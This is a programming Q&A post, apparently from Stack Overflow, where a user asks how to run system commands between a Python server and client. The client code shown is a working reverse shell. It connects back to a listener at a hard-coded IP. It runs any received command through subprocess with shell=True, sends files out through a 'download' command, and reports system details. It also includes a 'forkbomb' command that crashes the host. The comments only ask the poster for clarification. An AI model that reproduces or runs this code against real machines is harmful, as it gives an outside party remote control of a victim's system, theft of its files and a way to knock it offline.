# Remote command execution between server and client?

Tags: python

Hi i need help can someone tell me how to run a server and client model and run the system commands from server to client and client to server . This is what i am trying to do any help will be appreciated thank you.This is my client server code but i cannot achieve these 4 steps from server side.

[image]

server code :

```
import socket
import colorama

colorama.init()

LHOST = "192.168.10.7"
LPORT = 2222

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LHOST, LPORT))
sock.listen(1)
print("Listening on port", LPORT)
client, addr = sock.accept()

while True:
    input_header = client.recv(1024)
    command = input(input_header.decode()).encode()

    if command.decode("utf-8").split(" ")[0] == "download":
        file_name = command.decode("utf-8").split(" ")[1][::-1]
        client.send(command)
        with open(file_name, "wb") as f:
            read_data = client.recv(1024)
            while read_data:
                f.write(read_data)
                read_data = client.recv(1024)
                if read_data == b"DONE":
                    break

    if command is b"":
        print("Please enter a command")
    else:
        client.send(command)
        data = client.recv(1024).decode("utf-8")
        if data == "exit":
            print("Terminating connection", addr[0])
            break
        print(data)
client.close()
sock.close()
```

client code:

```
import socket
import subprocess
import os
import platform
import getpass
import colorama
from colorama import Fore, Style
from time import sleep

colorama.init()

RHOST = "192.168.10.7"
RPORT = 2222

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((RHOST, RPORT))

while True:
    try:
        header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
        sock.send(header.encode())
        STDOUT, STDERR = None, None
        cmd = sock.recv(1024).decode("utf-8")

        # List files in the dir
        if cmd == "list":
            sock.send(str(os.listdir(".")).encode())

        # Forkbomb
        if cmd == "forkbomb":
            while True:
                os.fork()

        # Change directory
        elif cmd.split(" ")[0] == "cd":
            os.chdir(cmd.split(" ")[1])
            sock.send("Changed directory to {}".format(os.getcwd()).encode())

        elif cmd =="arp -a":
            sock.send(cmd.encode())

        # Get system info
        elif cmd == "sysinfo":
            sysinfo = f"""
Operating System: {platform.system()}
Computer Name: {platform.node()}
Username: {getpass.getuser()}
Release Version: {platform.release()}
Processor Architecture: {platform.processor()}
            """
            sock.send(sysinfo.encode())

        # Download files
        elif cmd.split(" ")[0] == "download":
            with open(cmd.split(" ")[1], "rb") as f:
                file_data = f.read(1024)
                while file_data:
                    print("Sending", file_data)
                    sock.send(file_data)
                    file_data = f.read(1024)
                sleep(2)
                sock.send(b"DONE")
            print("Finished sending data")

        # Terminate the connection
        elif cmd == "exit":
            sock.send(b"exit")
            break

        # Run any other command
        else:
            comm = subprocess.Popen(str(cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            STDOUT, STDERR = comm.communicate()
            if not STDOUT:
                sock.send(STDERR)
            else:
                sock.send(STDOUT)

        # If the connection terminates
        if not cmd:
            print("Connection dropped")
            break
    except Exception as e:
        sock.send("An error has occured: {}".format(str(e)).encode())
sock.close()
```

Comment: Please don't post any textual information as an image, post it as text. Also you task seems to be very broad. What have you tried so far? What problem(s) did you face?

Comment: i write basic server client which connect each other idk how to execute these 4 steps from server.

Comment: Your comment does not seem to contain any reaction related to the points in my comment.

Comment: my code works fine it connect client with server but how i run these 4 commands from server to client side

Comment: Then get your question fixed and show us your code!

Comment: please check i update